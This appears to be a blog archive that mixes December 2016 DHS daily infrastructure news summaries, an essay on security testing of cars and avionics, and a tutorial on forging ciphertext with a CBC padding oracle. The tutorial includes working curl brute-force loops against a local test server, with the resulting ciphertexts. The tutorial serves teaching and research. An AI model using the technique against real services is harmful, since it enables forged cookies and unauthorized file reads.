1. December 20, Washington Post – (International) President bans oil drilling in large areas of Atlantic and Arctic oceans. The U.S. President declared December 20, in coordination with the Canadian Prime Minister, that hundreds of millions of acres of Federally-owned land in the Arctic Ocean and canyons in the Atlantic Ocean were withdrawn from offshore oil and gas drilling in an effort to protect the regions from future offshore oil and gas activity risks. The declaration will protect areas of Atlantic Ocean canyons that stretch from Massachusetts to Virginia, and large portions of the Chukchi and Beaufort seas north of Alaska. Source: https://www.washingtonpost.com/news/energy-environment/wp/2016/12/20/president-obama-expected-to-ban-oil-drilling-in-large-areas-of-atlantic-and-arctic-oceans/?utm_term=.5732ebff424b

• Volkswagen Group announced December 20 that it will pay $225 million in environmental remediation after it was found that the company fitted several makes of its vehicles with software used to cheat U.S. emissions standards. – USA Today

2. December 20, USA Today – (National) Volkswagen will buy back 20K more polluting diesel cars. The U.S. Environmental Protection Agency, U.S. Department of Justice, and California State regulators announced December 20 that the Volkswagen Group agreed to pay $225 million in environmental remediation, fix around 63,000 of its vehicles, and buy back another 20,000 vehicles equipped with 3-liter, 6-cylinder diesel engines in the U.S. after it was found that the company fitted several makes of its vehicles with software used to cheat U.S. emissions standards. Source: http://www.usatoday.com/story/money/cars/2016/12/20/volkswagen-3-liter-diesel-settlement/95661794/

• The former owner and president of Staten Island, New York-based Premier Links, Inc. were arrested December 20 for allegedly stealing $9.3 million from more than 300 investors in roughly 40 States through their unregistered broker-dealer business. – U.S. Attorney’s Office, Eastern District of New York See item 3 below in the Financial Services Sector

• The former owner and operator of a Rockingham, North Carolina-based tax preparation business pleaded guilty December 19 after he caused the U.S. Internal Revenue Service (IRS) over $10 million in losses. – U.S. Department of Justice See item 4 below in the Financial Services Sector

Financial Services Sector

3. December 20, U.S. Attorney’s Office, Eastern District of New York – (National) Former owner and president of unregistered broker-dealer indicted in a $9 million securities fraud scheme. The former owner and president of Staten Island, New York-based Premier Links, Inc. were arrested December 20 for allegedly stealing $9.3 million from more than 300 investors in roughly 40 States from approximately 2005 – 2012 through their unregistered broker-dealer business by persuading investors to purchase shares of worthless businesses with the promise of large returns. The charges allege that the executives operated Premier Links as a “boiler room,” using cold callers and other means to compel victims to invest their money in securities, and converted investors’ money upon receipt into cash through more than 900 ATM and teller withdrawals, among other fraudulent actions. Source: https://www.justice.gov/usao-edny/pr/former-owner-and-president-unregistered-broker-dealer-indicted-9-million-securities

4. December 19, U.S. Department of Justice – (North Carolina) North Carolina owner of tax preparation business pleads guilty to conspiracy to defraud the IRS. The former owner and operator of a Rockingham, North Carolina-based tax preparation business, Herb’s Helping Hands, pleaded guilty December 19 after he caused the U.S. Internal Revenue Service (IRS) over $10 million in losses by preparing and filing fraudulent electronic Federal income tax returns that claimed fictitious refunds for clients, and reporting fake or inflated income and dependency exemptions to produce false or inflated Earned Income Tax Credits, fake business income and deficits, and fraudulent deductions, among other fraudulent actions. The owner and his co-conspirators bought or stole the personal identifying information of minors and other individuals, falsely listing them as dependents on returns to generate larger fraudulent client refunds, and directed some of the clients’ refunds into his own bank account or an account he controlled. Source: https://www.justice.gov/opa/pr/north-carolina-owner-tax-preparation-business-pleads-guilty-conspiracy-defraud-irs

Information Technology Sector

20. December 21, SecurityWeek – (International) VMware patches VDP, ESXi vulnerabilities. VMware released patches addressing a flaw in vSphere Data Protection (VDP) which could be exploited to log into the affected appliance with root privileges, as well as a cross-site scripting (XSS) vulnerability in the ESXi hypervisor where an attacker with permission to manage virtual machines (VM) via the ESXi Host Client can import a maliciously crafted VM to trigger the flaw, or can trick a vSphere administrator into importing the specially crafted VM.

For another story, see item 21 below in the Communications Sector

Communications Sector

21. December 20, SecurityWeek– (International) Cybercriminals make millions with ad fraud bot farm. White Ops researchers reported that cybercriminals can earn up to $5 million per day through a massive ad fraud operation, dubbed Methbot, which is powered by a bot farm that uses up to 1,200 servers housed by data centers in Dallas and other cities, and more than 570,000 Internet Protocol version 4 (IPv4) addresses to make it appear as though they belong to residential Internet service providers (ISPs) in the U.S. The bot farm generates a fake Webpage with only the elements needed to support an ad, and then requests an ad from a network using a spoofed Uniform Resource Locator (URL) matching that of a premium publisher, which is subsequently loaded in the simulated browser while Methbot’s various human-mimicking mechanisms are enabled to convince anti-fraud systems the activity is generated by real users.

MS16-148 – Critical: Security Update for Microsoft Office (3204068) – Version: 1.1

Severity Rating: Critical
Revision Note: V1.1 (December 21, 2016): Revised bulletin to correct a CVE ID. CVE-2016-7298 has been changed to CVE-2016-7274, and the vulnerability information has been updated. This is an informational change only. Customers who have successfully installed the updates do not need to take any further action.
Summary: This security update resolves vulnerabilities in Microsoft Office. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Office file. An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Wednesday, December 21, 2016



Complete DHS Report for December 21, 2016

Daily Report                                            

Top Stories

• A Chinese national pleaded guilty December 19 to stealing and exploiting highly sensitive military technology and documents, and transporting the majority of the stolen information to China from 2013 – 2014. – U.S. Department of Justice

3. December 19, U.S. Department of Justice – (Connecticut) Chinese national admits to stealing sensitive military program documents from United Technologies. A Chinese national pleaded guilty December 19 to stealing and exploiting highly sensitive military technology and documents from United Technologies Corporation’s United Technologies Research Center (UTRC) and transporting the majority of the stolen information to China from 2013 – 2014. The defendant admitted his intent to advance China’s defense industry, and beginning in 2013, expressed his intent to individuals outside UTRC to return to China to work on research projects at select Chinese State-run universities using knowledge and materials he had acquired during his UTRC employment.

• Bliss, Idaho officials worked to clean up roughly 6,000 gallons of raw sewage that spilled over a lagoon dike edge December 17. – KMVT 11 Twin Falls/KSVT 14 Twin Falls

12. December 17, Los Angeles Times – (California) Orange County children’s dental clinic closed after bacteria found in new water system. Health officials in Orange County, California, ordered the closure of the Children’s Dental Group of Anaheim December 15 after lab tests revealed the presence of Mycobacterium in the dental clinic’s new internal water system, which was replaced following a previous outbreak of oral infections. The county has recorded 58 reports of infections at the clinic. Source: http://www.latimes.com/local/lanow/la-me-ln-anaheim-dental-office-20161217-story.html

• Los Angeles County officials announced December 19 it is notifying about 756,000 people that their personal information may have been compromised after 108 county employees were victims of a phishing email scam in May 2016. – SecurityWeek

14. December 19, SecurityWeek – (California) Los Angeles County notifies 756,000 of data breach. Los Angeles County officials announced December 19 it is notifying about 756,000 people that their personal information including Social Security numbers, names, and dates of birth, among other sensitive information, may have been compromised after 108 county employees were victims of a phishing email scam in May 2016. Officials reported a Nigerian national was charged in connection with the incident. Source: http://www.securityweek.com/los-angeles-county-notifies-756000-data-breach
• Kaspersky Lab researchers warned that a spear phishing campaign has targeted roughly 500 organizations in the smelting, power generation and transmission, construction, and engineering industries across 50 countries since August 2016. – SecurityWeek See item 20 below in the Information Technology Sector

Financial Services Sector

4. December 19, Arizona Republic – (Arizona) FBI seeks leads on ‘Blues Bandit’ bank robber who struck in Phoenix, Glendale. The FBI is searching December 19 for a man dubbed the “Blues Bandit” who is suspected of robbing 3 Desert Schools Federal Credit Union locations inside Walmart stores in Phoenix and Glendale, Arizona, between October and December 2016. Source: http://www.azcentral.com/story/news/local/phoenix/2016/12/19/fbi-seeks-leads-blues-bandit-bank-robber-who-struck-phoenix-glendale/95612948/

Information Technology Sector

20. December 19, SecurityWeek – (International) Spear phishing attacks target industrial firms. Kaspersky Lab researchers warned that a spear phishing campaign has targeted roughly 500 organizations in the smelting, power generation and transmission, construction, and engineering industries across 50 countries since August 2016 in order to spy on users and steal sensitive data. The phishing emails contain a subject line with text used in a company’s correspondence in order to trick the victim into opening the malicious Rich Text Format (RTF) file attached, which downloads a malware that can diminish the ability of antivirus products. Source: http://www.securityweek.com/spear-phishing-attacks-target-industrial-firms-kaspersky-lab-ics-cert

21. December 19, SecurityWeek – (International) Brute force attacks on WordPress Websites soar. WordPress security firm Wordfence warned that the number of brute force attacks targeting WordPress Websites have increased to more than 700,000 attacks per day since November 24, and the number of unique attack Internet Protocols (IPs) has increased from an average of about 13,000 per day in the period between October 16 and November 24 to over 30,000 per day. The firm reported it has blocked up to 23 million brute force attack attempts per day.

For another story, see item 14 above in Top Stories

Communications Sector

Nothing to report

Hacking Complex Systems

Back in the day, you could download a piece of software, reverse engineer / fuzz it, find bugs, notify the vendor, post on Full Disclosure, watch a patch come out, and move on to the next bug.

These days systems have become very complex. A system might include:
  • A HID (Touch screen, keyboard, other devices)
  • Data Inputs (USB key, Bluetooth, Wireless, Satellite, Cell)
  • Firmware (BIOS or other embedded aspects)
  • OS
  • Applications (both OEM and 3rd party)
  • Media Servers
  • Other control systems
  • Telematics interfaces

This collection of components may be very expensive, on the order of 250k in some cases, or say 10-20k for a car. These components may be made by multiple different vendors, all with NDA's and MSA's between them.

This whole system is then certified and tested by numerous bodies such as FAA, TSA, NHTSA, NAFTA OEMs, Avionics Manufacturers such as Boeing and Airbus, Airlines, etc. There may be regulations and requirements around patch cycle timing, disclosure, and legal.

How in this context, can these systems be tested for security issues in a reliable and effective manner? Right now there are several ways this testing occurs:

1.) Via Testing Contracts.

The vendor puts out a bid or otherwise engages a 3rd party security company to test the system. NDAs and MSAs are exchanged, access to the system is provided, testing performed, and results delivered. Fixes are developed and pushed out according to the schedule and requirements agreed upon by all the organizations outlined above.

PROS

Vendor has a level of protection that their reputation won't be tarnished via media disclosures, their IP stolen, etc. Vendor has some assurance the testers are competent and there is a level of service expected.

CONS

This process is not public and people outside this framework have little to no insight into what is going on, how testing is done (or if), who is doing it, what fixes have been put in place. etc. This also limits the number of bright people who can see and test the system, almost ensuring that some bugs will be missed.

2.) Bug Bounties.

Vendors make some aspect of the system available publicly for anyone to test and pays a bounty for valid vulnerabilities discovered. In some special cases the vendor may make an entire system accessible for a limited amount of time. (Time limited to offset the cost of the system)

PROS

Process is public and many eyes are on the product. Raises the exposure of the product to new testers and approaches. Builds a level of trust in the vendor and assurance that the vendor "cares about security".

CONS

Costs the vendor time and effort and often produces little more than noise, or bugs already known about through internal testing. (I'm basing this on my personal discussions with vendors in the real world). Testing quality is often very low. Often the holistic system cannot be tested in this way, only components.

3.) Rogue Testing.

This is sort of where I came up in the industry initially before moving more into 1.) above. The way this works is that a researcher (or team of researchers) and/or a security company gain access to a system in some way. Examples include buying a piece of the system on eBay or in the case of publicly available systems such as avionics, testing it live. A car could be bought as well. This is sort of a black box approach as access to all the back end systems, telematics, source, .etc. will not be available.

PROS

A researcher can sort of do whatever they want without constraints. A security company can leverage this for media attention (marking / sales), and it drums up interest for conference talks. Real bugs are found this way and the vendor is technically notified, either as a heads up by the finder or via the media.

CONS

No trust is developed between the vendor and the bug finder. In fact the relationship is almost always adversarial by its nature. The public receives an unclear picture of the true threat. Do they trust the finder who is often over hyping to get attention or do they trust the vendor who has a material interest in under hyping and disproving the bug.

I'm sure I am missing other pros and cons to each of these, so please feel free to send me ideas. I'm also sure there are other approaches to testing which is why I am making this post. Here are some questions to consider:

  • Are complex systems such as avionics and automotive substantially the same from a testing perspective as windows hosts or endpoint software?
  • Is live testing on a passenger vehicle really the right way to do security testing?
  • Should only professional security companies with contracts in hand be allowed to test?
  • Are bug bounties in their current incarnation really effective for these types of systems?
My answer to the above questions is probably no.

I propose that we, the security community, collectively try to come up with a better way or framework for doing this. Any ideals will be appreciated and considered. Are you already doing something in this arena that is better than what I have outlined? Is there something you thought would work but have not gotten traction on it?

I'd love to hear from vendors, sec companies, and researchers alike.

I also propose that unethical behavior in our industry be called out. Every time a company brushes up against extortion, over hypes a bug, or claims credit for non-employee's work, just for short term sales, it damages the credibility of all of us and makes our jobs harder. Lets require the best of ourselves. Security has become huge, and is about to become bigger. Over the last year think how many times hacking has been in main stream media. Now contrast that with 10 years ago. This is an industry that is about to explode. Do we really want to be found wanting when the world finally is ready to take us seriously?

Tuesday, December 20, 2016



Complete DHS Report for December 20, 2016

Daily Report                                            

Top Stories

• The president of Lisle, Illinois-based Capital Management Associates Inc. was charged December 14 for allegedly engaging in a $400 million fraudulent securities trading scheme. – U.S. Attorney’s Office, Northern District of Illinois See item 8 below in the Financial Services Sector

• Officials announced December 16 that Deutsche Bank AG agreed to pay a total of $37 million to resolve charges that the firm made materially false statements and omissions to its clients regarding the Dark Pool Ranking Model feature of one of its order routers. – U.S. Securities and Exchange Commission See item 9 below in the Financial Services Sector

• Lynda.com announced it will notify about 9.5 million users worldwide that their user information may have been compromised after an unauthorized third party accessed a database containing the information. – SecurityWeek See item 26 below in the Information Technology Sector

• Three Romanian nationals were extradited to the U.S. the week of December 12 and charged for their alleged roles in a $4 million cyber fraud scheme where the trio infected at least 60,000 devices, primarily in the U.S. – U.S. Department of Justice See item 29 below in the Information Technology Sector

Financial Services Sector

7. December 17, Southern California City News Service – (California) Recognize the Valley's 'Skipper Bandit' bank robber? The FBI continued to search December 16 for a man dubbed the “Skipper Bandit,” who has allegedly robbed or attempted to rob 6 banks, primarily in California’s San Fernando Valley, between July 2015 and July 2016.

8. December 16, U.S. Attorney’s Office, Northern District of Illinois – (International) Suburban investment advisor charged with securities fraud for engaging in fraudulent allocation scheme. The president of Lisle, Illinois-based Capital Management Associates Inc. was charged December 14 for allegedly placing more than $400 million in securities trades without disclosing in advance if he was trading personal funds or client funds, waiting up to 5 days to allocate the trades so that he could choose the profitable ones for his personal accounts and assign the losing ones to the accounts of unsuspecting clients, as well as withdrawing more than $1 million in profits earned from the scheme from his personal accounts between July 2008 and August 2012. The charges allege that the defendant bought over 16,000 publicly traded securities, including shares in The Walgreen Company, British Petroleum, and Caterpillar Inc., among other firms. Source: https://www.justice.gov/usao-ndil/pr/suburban-investment-advisor-charged-securities-fraud-engaging-fraudulent-allocation

9. December 16, U.S. Securities and Exchange Commission – (International) Deutsche Bank settles charges of misleading clients about order router. The U.S. Securities and Exchange Commission (SEC) and New York Attorney General’s office announced December 16 that Deutsche Bank AG agreed to pay a total of $37 million to resolve charges that the firm made materially false statements and omissions to its clients regarding the Dark Pool Ranking Model feature of one of its order routers, SuperX+, where, due to a coding error, the bank updated the ranking model only once during a 2-year period, causing at least 2 dark pools to receive inflated rankings and consequently generate millions of orders that SuperX+ would have sent elsewhere if the system was operating the way the bank described. The SEC also discovered that the firm manually overrode the Dark Pool rankings in select instances and manually assigned fill rates for new venues based on subjective judgment that was inconsistent with the venues’ real performance.
Source: https://www.sec.gov/news/pressrelease/2016-264.html

For another story, see item 28 below in the Information Technology Sector

Information Technology Sector

25. December 19, SecurityWeek – (International) Privilege escalation, RCE flaws patched in Nagios Core. A security researcher from Legal Hackers discovered the Nagios Core alerting and monitoring software is plagued by two vulnerabilities, one of which is a remote code execution (RCE) flaw that can be exploited by a man-in-the-middle (MitM) attacker via the Rich Site Summary (RSS) feed feature, allowing the malicious actor to read and write arbitrary files on the compromised server, as well as execute code in the context of a Nagios user. Once an attacker achieves this level of access, the actor can exploit the second flaw to elevate their privileges to root, potentially causing the entire system to be compromised.
Source: http://www.securityweek.com/privilege-escalation-rce-flaws-patched-nagios-core 

26. December 19, SecurityWeek – (International) LinkedIn’s Lynda.com notifies users of data breach. Lynda.com, LinkedIn’s online learning platform, announced it will notify about 9.5 million users worldwide that their user information may have been compromised after the company became aware that a database containing user information had been accessed by an unauthorized third party. LinkedIn stated the passwords of roughly 55,000 Lynda.com users have been reset as a precaution, and there is no evidence that passwords were exposed or that any data was made publicly available.
Source: http://www.securityweek.com/linkedins-lyndacom-notifies-users-data-breach

27. December 19, SecurityWeek – (International) MacBooks leak disk encryption password. A security researcher discovered that an attacker with physical access to a locked or sleeping Apple MacBook can retrieve the FileVault 2 password in clear text by connecting a special device to the targeted device’s Thunderbolt port due to the fact that the direct memory access (DMA) attack protections are not active before the operating system (OS) has booted, thereby enabling an attacker to read and write memory from a MacBook device via the Thunderbolt device. The researcher found that the attack does not work if the targeted MacBook has been turned off as the password is no longer available in the memory. Source: http://www.securityweek.com/macbooks-leak-disk-encryption-password

28. December 16, SecurityWeek – (International) Updated Tordow Android malware gets ransomware capabilities. Comodo security researchers warned that an updated version of the Tordow Android malware, dubbed Tordow v2.0 was spotted and is now able to act as a ransomware, steal login credentials, and manipulate banking data, as well as encrypt and decrypt files, and remove security software. The malware spreads through compromised variants of popular social media and gaming applications that are available for download via third-party Websites and behave like the legitimate apps, while they include embedded and encrypted malicious functions. Source: http://www.securityweek.com/updated-tordow-android-malware-gets-ransomware-capabilities

29. December 16, U.S. Department of Justice – (International) Three Romanian nationals indicted in $4 million cyber fraud scheme that infected at least 60,000 computers and sent 11 million malicious emails. Three Romanian nationals were extradited to the U.S. the week of December 12 and charged for their alleged roles in a $4 million cyber fraud scheme where the trio infected at least 60,000 devices, primarily in the U.S., by sending more than 11 million malicious emails that contained a malware that the group created in order to harvest personally identifiable information, such as credit card information and user names and passwords from the infected devices. The trio reportedly used the stolen credit card information to fund their criminal activities. Source: https://www.justice.gov/opa/pr/three-romanian-nationals-indicted-4-million-cyber-fraud-scheme-infected-least-60000-computers

Communications Sector

See item 28 above in the Information Technology Sector

Going the other way with padding oracles: Encrypting arbitrary data!

A long time ago, I wrote a couple blogs that went into a lot of detail on how to use padding oracle vulnerabilities to decrypt an encrypted string of data. It's pretty important to understand to use a padding oracle vulnerability for decryption before reading this, so I'd suggest going there for a refresher.

When I wrote that blog and the Poracle tool originally, I didn't actually know how to encrypt arbitrary data using a padding oracle. I was vaguely aware that it was possible, but I hadn't really thought about it. But recently, I decided to figure out how it works. I thought and thought, and finally came up with this technique that seems to work. I also implemented it in Poracle in commit a5cfad76ad.

Although I technically invented this technique myself, it's undoubtedly the same technique that any other tools / papers use. If there's a better way - especially on dealing with the first block - I'd love to hear it!

Anyway, in this post, we'll talk about a situation where you have a padding oracle vulnerability, and you want to encrypt arbitrary data instead of decrypting their data. It might, for example, be a cookie that contains a filename for your profile data. If you change the encrypted data in a cookie to an important file on the filesystem, suddenly you have arbitrary file read!

The math

If you aren't familiar with block ciphers, how they're padded, how XOR (⊕) works, or how CBC chaining works, please read my previous post. I'm going to assume you're familiar with all of the above!

We'll define our variables more or less the same as last time:

  Let P   = the plaintext, and Pn = the plaintext of block n (where n is in
            the range of 1..N). We select this.
  Let C   = the corresponding ciphertext, and Cn = the ciphertext
            of block n (the first block being 1) - our goal is to calculate this
  Let N   = the number of blocks (P and C have the same number of blocks by
            definition). PN is the last plaintext block, and CN is
            the last ciphertext block.
  Let IV  = the initialization vector — a random string — frequently
            (incorrectly) set to all zeroes. We'll mostly call this C0 in this
            post for simplicity (see below for an explanation).
  Let E() = a single-block encryption operation (any block encryption
            algorithm, such as AES or DES, it doesn't matter which), with some
            unique and unknown (to the attacker) secret key (that we don't
            notate here).
  Let D() = the corresponding decryption operation.

And the math for encryption:

  C1 = E(P1 ⊕ IV)
  Cn = E(Pn ⊕ Cn-1) — for all n > 1

And, of course, decryption:

  P1 = D(C1) ⊕ IV
  Pn = D(Cn) ⊕ Cn-1 - for all n > 1

Notice that if you define the IV as C0, both formulas could be simplified to just a single line.

The attack

Like decryption, we divide the string into blocks, and attack one block at a time.

We start by taking our desired string, P, and adding the proper padding to it, so when it's decrypted, the padding is correct. If there are n bytes required to pad the string to a multiple of the block length, then the byte n is added n times.

For example, if the string is hello world! and the blocksize is 16, we have to add 4 bytes, so the string becomes hello world!\x04\x04\x04\x04. If the string is an exact multiple of the block length, we add a block afterwards with nothing but padding (so this is a test!!, because it's 16 bytes, becomes this is a test!!\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10, for example (assume the blocksize is 16, which will will throughout).

Once we have a string, P, we need to generate the ciphertext, C from it. And here's how that happens...

Overview

After writing everything below, I realized that it's a bit hard to follow. Math, etc. So I'm going to start by summarizing the steps before diving more deeply into all the details. Good luck!

To encrypt arbitrary text with a padding oracle...

  • Select a string, P, that you want to generate ciphertext, C, for
  • Pad the string to be a multiple of the blocksize, using appropriate padding, then split it into blocks numbered from 1 to N
  • Generate a block of random data (CN - ultimately, the final block of ciphertext)
  • For each block of plaintext, starting with the last one...
    • Create a two-block string of ciphertext, C', by combining an empty block (00000...) with the most recently generated ciphertext block (Cn+1) (or the random one if it's the first round)
    • Change the last byte of the empty block until the padding errors go away, then use math (see below for way more detail) to set the last byte to 2 and change the second-last byte till it works. Then change the last two bytes to 3 and figure out the third-last, fourth-last, etc.
    • After determining the full block, XOR it with the plaintext block Pn to create Cn
    • Repeat the above process for each block (prepend an empty block to the new ciphertext block, calculate it, etc)

To put that in English: each block of ciphertext decrypts to an unknown value, then is XOR'd with the previous block of ciphertext. By carefully selecting the previous block, we can control what the next block decrypts to. Even if the next block decrypts to a bunch of garbage, it's still being XOR'd to a value that we control, and can therefore be set to anything we want.

A quick note about the IV

In CBC mode, the IV - initialization vector - sort of acts as a ciphertext block that comes before the first block in terms of XOR'ing. Sort of an elusive "zeroeth" block, it's not actually decrypted; instead, it's XOR'd against the first real block after decrypting to create P1. Because it's used to set P1, it's calculated exactly the same as every other block we're going to talk about, except the final block, CN, which is random.

If we don't have control of the IV - which is pretty common - then we can't control the first block of plaintext, P1, in any meaningful way. We can still calculate the full plaintext we want, it's just going to have a block of garbage before it.

Throughout this post, just think of the IV another block of ciphertext; we'll even call it C0 from time to time. C0 is used to generate P1 (and there's no such thing as P0).

Generate a fake block

The "last" block of ciphertext, CN, is generated first. Normally you'd just pick a random blocksize-length string and move on. But you can also have some fun with it! The rest of this section is just a little playing, and is totally tangential to the point; feel free to skip to the next section if you just want the meat.

So yeah, interesting tangential fact: the final ciphertext block, CN can be any arbitrary string of blocksize bytes. All 'A's? No problem. A message to somebody? No problem. By default, Poracle simply randomizes it. I assume other tools do as well. But it's interesting that we can generate arbitrary plaintext!

Let's have some fun:

  • Algorithm = "AES-256-CBC"
  • Key = c086e08ad8ee0ebe7c2320099cfec9eea9a346a108570a4f6494cfe7c2a30ee1
  • IV = 78228d4760a3675aa08d47694f88f639
  • Ciphertext = "IS THIS SECRET??"

The ciphertext is ASCII!? Is that even possible?? It is! Let's try to decrypt it:

  2.3.0 :001 > require 'openssl'
   => true

  2.3.0 :002 > c = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
   => #<OpenSSL::Cipher::Cipher:0x00000001de2578>

  2.3.0 :003 > c.decrypt
   => #<OpenSSL::Cipher::Cipher:0x00000001de2578>

  2.3.0 :004 > c.key = ['c086e08ad8ee0ebe7c2320099cfec9eea9a346a108570a4f6494cfe7c2a30ee1'].pack('H*')
   => "\xC0\x86\xE0\x8A\xD8\xEE\x0E\xBE|# \t\x9C\xFE\xC9\xEE\xA9\xA3F\xA1\bW\nOd\x94\xCF\xE7\xC2\xA3\x0E\xE1" 

  2.3.0 :005 > c.iv = ['78228d4760a3675aa08d47694f88f639'].pack('H*')
   => "x\"\x8DG`\xA3gZ\xA0\x8DGiO\x88\xF69" 

  2.3.0 :006 > c.update("IS THIS SECRET??") + c.final()
   => "NO, NOT SECRET!" 

It's ciphertext that looks like ASCII ("IS THIS SECRET??") that decrypts to more ASCII ("NO, NOT SECRET!"). How's that even work!?

We'll see shortly why this works, but fundamentally: we can arbitrarily choose the last block (I chose ASCII) for padding-oracle-based encryption. The previous blocks - in this case, the IV - is what we actually have to determine. Change that IV, and this won't work anymore.

Calculate a block of ciphertext

Okay, we've created the last block of ciphertext, CN. Now we want to create the second-last block, CN-1. This is where it starts to get complicated. If you can follow this sub-section, everything else is easy! :)

Let's start by making a new ciphertext string, C'. Just like in decrypting, C' is a custom-generated ciphertext string that we're going to send to the oracle. It's made up of two blocks:

  • C'1 is the block we're trying to determine; we set it to all zeroes for now (though the value doesn't actually matter)
  • C'2 is the previously generated block of ciphertext (on the first round, it's CN, the block we randomly generated; on ensuing rounds, it's Cn+1 - the block after the one we're trying to crack).

I know that's confusing, but let's push forward and look at how we generate a C' block and it should all become clear.

Imagine the string:

  C' = 00000000000000000000000000000000 || CN
                ^^^ CN-1 ^^^               

Keep in mind that CN is randomly chosen. We don't know - and can't know - what C'2 decrypts to, but we'll call it P'2. We do know something, though - after it's decrypted to something, it's XOR'd with the previous block of ciphertext (C'1), which we control. Then the padding's checked. Whether or not the padding is correct or incorrect depends wholly on C'1! That means by carefully adjusting C'1, we can find a string that generates correct padding for P'2.

Because the only things that influence P'2 are the encryption function, E(), and the previous ciphertext block, C'1, we can set it to anything we want without ever seeing it! And once we find a value for C' that decrypts to the P'2 we want, we have everything we need to create a CN-1 that generates the PN we want!

So we create a string like this:

  00000000000000000000000000000000 41414141414141414141414141414141
        ^^^ C'1 / CN-1 ^^^                  ^^^ C'2 / CN ^^^

The block of zeroes is the block we're trying to figure out (it's going to be CN-1), and the block of 41's is the block of arbitrary/random data (CN).

We send that to the server, for example, like this (this is on Poracle's RemoteTestServer.rb app, with a random key and blank IV - you should be able to just download and run the server, though you might have to run gem install sinatra):

  • http://localhost:20222/decrypt/0000000000000000000000000000000041414141414141414141414141414141

We're almost certainly going to get a padding error returned, just like in decryption (there's a 1/256 chance it's going to be right). So we change the last byte of block C'1 until we stop getting padding errors:

  • http://localhost:20222/decrypt/0000000000000000000000000000000141414141414141414141414141414141
  • http://localhost:20222/decrypt/0000000000000000000000000000000241414141414141414141414141414141
  • http://localhost:20222/decrypt/0000000000000000000000000000000341414141414141414141414141414141
  • http://localhost:20222/decrypt/0000000000000000000000000000000441414141414141414141414141414141
  • ...

And eventually, you'll get a success:

$ for i in `seq 0 255`; do
URL=`printf "http://localhost:20222/decrypt/000000000000000000000000000000%02x41414141414141414141414141414141" $i`
echo $URL
curl "$URL"
echo ''
done

http://localhost:20222/decrypt/0000000000000000000000000000000041414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000000141414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000000241414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000000341414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000000441414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000000541414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000000641414141414141414141414141414141
Success!
http://localhost:20222/decrypt/0000000000000000000000000000000741414141414141414141414141414141
Fail!
...

We actually found the valid encoding really early this time! When C'1 ends with 06, the last byte of P'2, decrypts to 01. That means if we want the last byte of the generated plaintext (P'2) to be 02, we simply have to XOR the value by 01 (to set it to 00), then by 02 (to set it to 02). 06 ⊕ 01 ⊕ 02 = 05. Therefore, if we set the last byte of C'1 to 05, we know that the last byte of P'2 will be 02, and we can start bruteforcing the second-last byte:

$ for i in `seq 0 255`; do
URL=`printf "http://localhost:20222/decrypt/0000000000000000000000000000%02x0541414141414141414141414141414141" $i`
echo $URL
curl "$URL"
echo ''
done

http://localhost:20222/decrypt/0000000000000000000000000000000541414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000010541414141414141414141414141414141
Fail!
...
http://localhost:20222/decrypt/0000000000000000000000000000350541414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/0000000000000000000000000000360541414141414141414141414141414141
Success!
...

So now we know that when C'N-1 ends with 3605, P'2 ends with 0202. We'll go one more step: if we change C'1 such that P'2 ends with 0303, we can start working on the third-last character in C'1. 36 ⊕ 02 ⊕ 03 = 37, and 05 ⊕ 02 ⊕ 03 = 04 (we XOR by 2 to set the values to 0, then by 3 to set it to 3):

$ for i in `seq 0 255`; do
URL=`printf "http://localhost:20222/decrypt/00000000000000000000000000%02x370441414141414141414141414141414141" $i`
echo $URL
curl "$URL"
echo ''
done

...
http://localhost:20222/decrypt/000000000000000000000000006b370441414141414141414141414141414141
Fail!
http://localhost:20222/decrypt/000000000000000000000000006c370441414141414141414141414141414141
Success!
...

So now, when C'1 ends with 6c3704, P'2 ends with 030303.

We can go on and on, but I automated it using Poracle and determined that the final value for C'1 that works is 12435417b15e3d7552810313da7f2417

$ curl 'http://localhost:20222/decrypt/12435417b15e3d7552810313da7f241741414141414141414141414141414141'
Success!

That means that when C'1 is 12435417b15e3d7552810313da7f2417, P'2 is 10101010101010101010101010101010 (a full block of padding).

We can once again use XOR to remove 101010... from C'1, giving us: 02534407a14e2d6542911303ca6f3407. That means that when C'1 equals 02534407a14e2d6542911303ca6f3407), P'2 is 00000000000000000000000000000000. Now we can XOR it with whatever we want to set it to an arbitrary value!

Let's say we want the last block to decrypt to 0102030405060708090a0b0c0d0e0f (15 bytes). We:

  • Add one byte of padding: 0102030405060708090a0b0c0d0e0f01
  • XOR C'1 (02534407a14e2d6542911303ca6f3407) with 0102030405060708090a0b0c0d0e0f01 => 03514703a4482a6d4b9b180fc7613b06
  • Append the final block, CN, to create C: 03514703a4482a6d4b9b180fc7613b0641414141414141414141414141414141
  • Send it to the server to be decrypted...
$ curl 'http://localhost:20222/decrypt/03514703a4482a6d4b9b180fc7613b0641414141414141414141414141414141'
Success

And, if you actually calculate it with the key I'm using, the final plaintext string P' is c49f1fdcd1cd93daf4e79a18637c98d80102030405060708090a0b0c0d0e0f.

(The block of garbage is a result of being unable to control the IV)

Calculating the next block of ciphertext

So now, where have we gotten ourselves?

We have values for CN-1 (calculated) and CN (arbitrarily chosen). How do we calculate CN-2?

This is actually pretty easy. We generate ourselves a two-block string again, C'. Once again, C'1 is what we're trying to bruteforce, and is normally set to all 00's. But this time, C'2 is CN-1 - the ciphertext we just generated.

Let's take a new C' of:

000000000000000000000000000000000 3514703a4482a6d4b9b180fc7613b06
        ^^^ C'1 / CN-2 ^^^                 ^^^ C'2 / CN-1 ^^^

We can once again determine the last byte of C'1 that will cause the last character of P'2 to be valid padding (01):

$ for i in `seq 0 255`; do
URL=`printf "http://localhost:20222/decrypt/000000000000000000000000000000%02x3514703a4482a6d4b9b180fc7613b06" $i`
echo $URL
curl "$URL"
echo ''
done
...
